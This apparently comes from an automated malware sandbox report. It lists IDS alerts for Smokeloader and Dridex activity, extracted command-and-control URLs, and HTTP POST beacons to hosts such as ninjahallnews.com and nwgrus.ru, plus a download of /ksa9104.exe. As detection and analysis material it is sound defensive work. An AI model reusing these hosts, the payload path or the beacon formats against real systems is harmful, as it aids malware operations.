    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61456 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61469 -> 190.249.249.14:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61433 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61433 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61435 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61436 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61438 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61436 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61441 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61435 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61438 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61437 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61441 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61444 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61443 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61444 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61437 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61451 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61443 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61439 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61463 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61451 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61465 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61439 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61463 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61442 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61465 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61447 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61450 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61454 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61442 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61454 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61470 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61467 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61470 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61467 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61447 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61450 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61440 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61434 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61440 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61445 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61434 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61446 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61448 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61446 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61448 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61445 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61452 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61452 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61449 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.6:61449 -> 23.145.40.168:443
    Source: C:\Windows\explorer.exe | Network Connect: 190.249.249.14 80
    Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 23.145.40.168 443
    Source: C:\Windows\explorer.exe | Network Connect: 23.145.40.164 443
    Source: C:\Windows\explorer.exe | Network Connect: 160.177.223.165 80
    Source: Malware configuration extractor | URLs: https://ninjahallnews.com/search.php
    Source: Malware configuration extractor | URLs: https://fallhandbat.com/search.php
    Source: Joe Sandbox View | IP Address: 23.145.40.164
    Source: Joe Sandbox View | ASN Name: SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox View | ASN Name: EPMTelecomunicacionesSAESPCO
    Source: Joe Sandbox View | ASN Name: SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox View | ASN Name: MT-MPLSMA
    Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.6:61433
    Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 23.145.40.164
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vucrathrxdck.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 241 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://krpqgyauqofjy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 368 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mjqditygumcpl.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 286 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://xmqdemcyeborscy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 114 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ivdqbkwbkfcqmd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 281 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kygmejbuqfed.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 209 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://oearusgjpsibxo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 366 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://bkkawsblriievtha.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 256 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://cdxudjgvudlubb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mdlgxwobmimrfsiq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 139 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kdihkbbguxoo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 264 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kwisrrqgrmlvi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 176 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ntbrsmlnvptwiq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 262 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://iymhwcsxyfccua.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://pyvpiskjnabcb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ndvftlyrsws.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 353 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vsqfnosbtpkyeiw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 291 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://viuhsicxwcdmbdc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 342 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://phumebsddarvf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 296 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://oqtouvjrjhoopu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 360 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ninjahallnews.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 501 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vufdhvyhyvwjjkm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://cnafyhqaamox.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vevyfytohbagkutf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://slehgyiiuvhyal.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ajlkwtshfrbwcj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 299 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lmqmhcivixmahfcs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 350 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://eqlgmwxqcstymthl.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uajyyjejyvvbvl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 110 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fcbqaeiodmerjjce.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 250 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uqyhewsqgme.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 129 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mcnivsvqoyuiyi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 197 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://snlvxdcuggcgtr.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rcayuliatuydngjp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 234 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gxhoywsjvhdimib.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hnkujwopesopy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 158 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gcsggiqiypjqctoh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://swrrssmuceopwlwv.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 194 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mcrofbggconl.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 245 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://euadhmjtligscip.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 287 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oratgvwctswjsrg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 289 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jukynnhymwnwl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 281 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pithrelifcqallw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kdahnseejtpvc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 147 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://umfnnmmrmjakpw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 314 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hjaonoqsbnhieap.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 286 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kfntyderqkkh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 258 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bpuffphxcjr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 219 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://evwfmjkyovghciew.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 264 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dxitdoiirfghic.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 220 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://goilbsuxbgu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 341 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bmhunjcauidhfjas.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ehqwwnwmwdh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 208 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oawojikvjxqxudp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 244 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xlurbvunmfixk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 320 | Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kamxftfsfgaby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqmylvnapebvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
